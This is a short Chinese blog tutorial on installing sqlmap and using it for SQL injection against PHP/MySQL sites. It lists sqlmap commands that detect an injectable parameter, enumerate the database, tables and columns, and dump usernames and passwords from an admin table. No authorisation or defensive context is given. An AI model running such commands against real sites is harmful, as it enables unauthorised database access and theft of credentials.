当前位置:首页 > 互联网杂谈 > 正文内容

利用sqlmap进行php+mysql注入(windows环境)

老威3年前 (2018-06-25)互联网杂谈24240

老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作

一、sqlmap的安装

1.python下载地址:

https://www.python.org/downloads/

2.sqlmap下载地址:

http://sqlmap.org/

把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\Python27” 目录下(注:Python27为python安装文件夹)

在桌面新建一个cmd的快捷方式,将其命名为“SQLMap”,并键入对象位置为:cmd,快捷方式名称:SQLMap

双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功。 

sqlmap教程

二、sqlmap的常用命令

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193"  检测注入

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-user   获取当前用户  laowei@localhost

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables  获取当前数据库下所有表 如表为3

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   获取表3下的所有字段 如字段为4,5,6

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后:此文章还待更新中……请持续关注

扫描二维码至手机访问

扫描二维码推送至手机访问。

版权声明:本文由老威SEO发布,如需转载请注明出处。

转载请注明出处:http://www.lwseo.cn/hlw/100.html

分享给朋友:

相关文章

火车采集器7.6版本闪退的解决办法

火车采集器7.6版本闪退的解决办法

老威最近在做几个站,因为数据量比较大,所以前期的东西都是要采集的,但是火车头采集器最近却一直闪退,采不了多少就崩溃一次,这让我很是烦躁,于是在网上找了几种方法,还真就找到了,分享给大家首先去火车头根目...

SSL POODLE[贵宾犬]漏洞的解决办法

SSL POODLE[贵宾犬]漏洞的解决办法

最近老威做了几个https协议的站,本来对ssl这东西不是很懂,全站重定向到https后,检测网站的时候出来一大堆漏洞,其中包括SSL POODLE,俗称“贵宾犬”漏洞,此漏洞是针对SSL3.0中CB...

整理了一些获得ip地理信息的几种方法

整理了一些获得ip地理信息的几种方法

第一种是利用纯真ip数据库,这个可以在网上找到很多,缺点是更新有点慢。第二种是利用各大门户网站的接口目前老威知道的有腾讯、新浪、网易、搜狐和Google提供IP地址查询API,但是找得到的只有腾讯、新...

CentOS7下如何安装GUI图形界面

CentOS7下如何安装GUI图形界面

临毕业时候买的阿里云的学生机服务器一直没怎么用,然后最近想玩玩linux,把那个系统盘换成了CentOS系统的,安装CentOS7服务器版本的时候,系统默认是不会安装图形界面的,大学的时候用过红帽的,...

zkeys对接支付宝当面付教程及插件

zkeys对接支付宝当面付教程及插件

一、支付宝当面付开通链接:支付宝当面付当面付具体的开通流程支付宝官方都给出了解释,老威在这里就不在做强调了;二、下载zkeys接入当面付插件:zkeys插件直接解压到网站根目录即可三、zkeys后台设...

windows server2012远程桌面多用户同时登录的方法

windows server2012远程桌面多用户同时登录的方法

目前市面上各大服务商的远程服务器老威几乎都用过,印象里好像只有西部数码是配备了允许三个远程用户同时登陆,其他的应该都是一个,这样其实非常不方便,如果一个公司有两个以上的技术同时对服务器有操作需求的话就...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。